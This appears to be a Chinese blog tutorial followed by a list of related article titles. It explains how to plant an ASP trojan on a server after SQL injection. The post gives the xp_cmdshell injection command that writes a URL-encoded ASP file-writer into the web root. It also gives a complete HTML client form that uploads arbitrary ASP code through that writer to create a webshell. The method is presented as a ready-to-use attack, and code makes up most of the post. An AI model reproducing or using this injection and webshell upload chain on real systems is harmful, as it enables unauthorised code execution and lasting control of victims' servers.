SQL注入后,如何上传木马,一直是比较头疼的事,我这里提供上传木马的一种另一种方法。
1、SQL注入的时候,用xp_cmdshell 向服务器上写入一个能写文件的asp文件。
文件内容:
<%
Set objFSO = Server.CreateObject
("scripting.FileSystemObject")

Set objCountFile=objFSO.CreateTextFile
(request("mypath"),True)

objCountFile.Write request("mydata")
objCountFile.Close
%>
这个文件可以写成一行
<%Set objFSO = Server.CreateObject
("scripting.FileSystemObject"):
Set objCountFile=objFSO.CreateTextFile
(request("mypath"),True):objCountFile.Write request("mydata"):
objCountFile.Close%>

将特殊字符进行编码 就可以得到
%3C%25Set%20objFSO%20=%20Server.CreateObject
(%22scripting.FileSystemObject%22):
Set%20objCountFile=objFSO.CreateTextFile(request(%22mypath%22),True):
objCountFile.Write%20request(%22mydata%22):objCountFile.Close%25%3E

注入(这里假定web目录是C:/Inetpub/wwwroot/): 
exec master..xp_cmdshell 'echo 
"%3C%25Set%20objFSO%20=%20Server.CreateObject
(%22scripting.FileSystemObject%22):
Set%20objCountFile=objFSO.CreateTextFile
(request(%22mypath%22),True):
objCountFile.Write%20request(%22mydata%22):
objCountFile.Close%25%3E" > C:/Inetpub/wwwroot/ftp.asp';

这样 在服务器的web 目录下 将生成一个 ftp.asp文件
该文件的代码为
<%
Set objFSO = Server.CreateObject
("scripting.FileSystemObject")
Set objCountFile=objFSO.CreateTextFile
(request("mypath"),True)
objCountFile.Write request
("mydata")
objCountFile.Close
%>
你可以看到,上面代码中预留了两个接口 mypath 和 mydata

mypath是下次提交的时候 文件的生成路径
mydata是文件的内容

在本地编写一个客户端文件 例:RohuClient.htm 代码如下

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>肉鸡文件生成器--客户端 制作:绝对零度 QQ:12216796</title>
<style type="text/css">
<!--
TD {
FONT-SIZE: 9pt; LINE-HEIGHT: 150%
}
BODY {
FONT-SIZE: 12px;
FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif, 宋体;
SCROLLBAR-FACE-COLOR: #eeeeee; 
SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; 
SCROLLBAR-SHADOW-COLOR: #dee3e7; 
SCROLLBAR-3DLIGHT-COLOR: #d1d7dc; 
SCROLLBAR-ARROW-COLOR: #006699; 
SCROLLBAR-TRACK-COLOR: #ededed; 
SCROLLBAR-DARKSHADOW-COLOR: #98aab1
}

A:link {
FONT-SIZE: 9pt; COLOR: #363636; LINE-HEIGHT: 18px; TEXT-DECORATION: none
}
A:visited {
FONT-SIZE: 9pt; COLOR: #363636; LINE-HEIGHT: 18px; TEXT-DECORATION: none
}
A:hover {
COLOR: #cc0000; LINE-HEIGHT: 18px; TEXT-DECORATION: underline
}
input,select,TEXTAREA {
font-family: "tahoma", "arial", "helvetica", "sans-serif", "宋体";
background-color: #f9f9f9; 
font-size: 9pt ; 
border: 1px #d2d2d2 dobble;
line-height:120%;
}

-->
</style>
</head>
<script language="javascript" type="text/javascript">
function chk(theform)
{
if(theform.ftpUrl.value=='')
{
alert('请输入递交的地址!');
theform.ftpUrl.focus();
return false;
}
if(theform.MyPath.value=='')
{
alert('请输入生成文件的位置!');
theform.MyPath.focus();
return false;
}
if(theform.MyData.value=='')
{
alert('请输入生成文件的内容!');
theform.MyData.focus();
return false;
}
theform.action=theform.ftpUrl.value;
}
</script>
<body>
<form name="RohuForm" method="post" 
action="" onSubmit="return chk(this)" target="_blank">

<table width="673" border="0" align="center" 
cellpadding="0" cellspacing="0">
<tr>
<td width="11%">目标位置:</td>
<td width="79%"><input name="ftpUrl"
type="text" id="ftpUrl" size="50">
例:http://127.0.0.1/FTP.ASP<;/td>
</tr>
<tr>
<td>生成文件:</td>
<td><input name="MyPath" type="text" id="MyPath">
将在服务器上,生成的文件路径。例:
C:/Inetpub/wwwroot/Server.asp </td>
</tr>
<tr>
<td valign="top">文件代码:</td>
<td><textarea name="MyData" cols="100" 
rows="10" id="textarea"></textarea></td>
</tr>
<tr>
<td> </td>
<td><input type="submit" name="Submit" value="提交"></td>
</tr>
</table>
<br>
</form>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td align="center">版权所有:
XXXX(<a href=http://www.rxxx.com;>xx盟</a>)</td>
</tr>
</table>
</body>
</html>

在目标位置栏填上刚刚生成的ftp.asp文件的url地址 
如 http://127.0.0.1/ftp.asp (这里假设服务器的ip是 127.0.0.1)
在生成文件栏 输入将在服务器上生成的文件名 比如:C:/Inetpub/wwwroot/Server.asp 
在文件内容里 ,随意的粘贴一个asp代码 
点递交,当http://127.0.0.1/ftp.asp 文件执行完毕 基本上服务器上的asp木马就生成了。

SQL注入与ASP木马上传相关推荐

  1. 任意文件上传mysql_BigDump 跨站脚本、SQL注入、任意文件上传漏洞

    发布日期:2012-11-28 更新日期:2012-12-04 受影响系统: ozerov BigDump 0.29b 描述: ------------------------------------ ...

  2. SQL注入天书-ASP注入漏洞全接触

    引     言                 随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多.但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序 ...

  3. 泛微OA V8 SQL注入漏洞和文件上传漏洞

    fofa语句 app="泛微-协同办公OA" SQL注入 在泛微OA V8中的getdata.jsp文件里,通过gatData方法将数据获取并回显在页面上,而在getData方法中 ...

  4. eWebEditor V7.3 for asp版本编辑器带后的破解码版本,新增加防止图片木马上传

    今天破解了eWebEditor编辑器最新版本7.3版本带后台管理,无功能限制,支持全部功能. 新增加防止图片木马上传 大家可以下载这个版本! 支持所有浏览器,演示:http://www.ewebedi ...

  5. phpmyadmin 弱密码导致一句话木马上传

    1.打开phpmyadmin(一般防火墙不能打开) 弱密码登陆后修改变量(123.php是上传的木马文件名,上传多个木马时不要重名) 在SQL输入select "<?php @_POS ...

  6. [转]数据安全之SQL注入资料整理

    SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别, 所以目前市面的防火墙都不会对SQL注入发出警报,如果管理员没查看IIS日志的习惯,可能被入侵很长时间都不会发觉. ...

  7. 第一次sql注入的教训与思考

    sql注入实验 靶场在云演课堂web安全入门sql注入第一节 这课程排的我也不知道啥是sql注入,啥是文件上传漏洞了 文章目录 sql注入实验 sql注入是如何发生的 假设 从服务端代码入手 show ...

  8. 【转载】SQL注入进阶

    被人黑怕了,每天在看别人怎么黑站,看到这文章还不错,就发上来了,希望大家提高安全意识啊, SQL注入天书 - ASP注入漏洞全接触 作者:NB联盟-小竹 来源:http://www.HackBase. ...

  9. sql注入漏洞,应屏蔽SQL注入攻击

    2019独角兽企业重金招聘Python工程师标准>>> 注:SQL注入好比是前端URL传参数请求时参数以SQL 做为参数传入,如 select 1  from dual where ...

最新文章

  1. 马斯克的90后合伙人离职Neuralink!5岁学编程,曾创立2家公司
  2. NVIDIA RTX技术是否会改变2019年的CG业务?
  3. css3实现不同进度条
  4. 分布式实时计算—从霍普金大学数据错误谈谈如何保证实时计算数据准确性
  5. php dns更新,php_mzdns: 站群,大量域名 通过 dns 服务商 api 批量添加 ip 工具。你懂的~ 基于 mzphp2 框架。...
  6. XCTF-高手进阶区:i-got-id-200
  7. 【POJ - 1287】 Networking (并查集 + 最小生成树)
  8. 利用子网掩码划分子网
  9. 2014计算机技术与软件专业技术资格 网络工程师考点,全国计算机技术与软件专业技术资格(水平)考试2014年下半年 网络工程师 答案详解.pdf...
  10. JAVA继承类phone_【Java基础】类-----继承
  11. JavaScript中的this关键字
  12. hibernate one2one 唯一外键关联(双向关联)
  13. mysqldump 导入导出数据
  14. 刚刚!蚂蚁全部互联网存款产品下架;阿里辟谣:被中央联合调查纯属谣言!...
  15. 零基础使用Xmind
  16. 网络软件-管理网络设备和组件
  17. Deep Learning(深度学习) 中文翻译
  18. 用户增长——CLV用户生命周期价值CLTV 笔记(一)
  19. 漫谈autoencoder:降噪自编码器/稀疏自编码器/栈式自编码器(含tensorflow实现)
  20. 电脑Win10 企业版如何激活

热门文章

  1. Spring Cloud kubernetes入门项目sck-demo
  2. 啊啊啊啊啊啊啊啊啊啊啊啊啊啊(一篇自述)
  3. 安装 SwitchyOmega 最简单的方法
  4. 2.SpringBoot整合Mybatis(一对一)
  5. Python ABC(抽象基类)
  6. mchain r语言_布林带交易策略R语言实现
  7. FXS/FXO, BRI/PRI, IPPBX, IAD
  8. 考研初试成绩出来了,然后呢...选导师!
  9. 洛谷P1830 轰炸
  10. .o0博客导读0o. 12/13/2010最后更新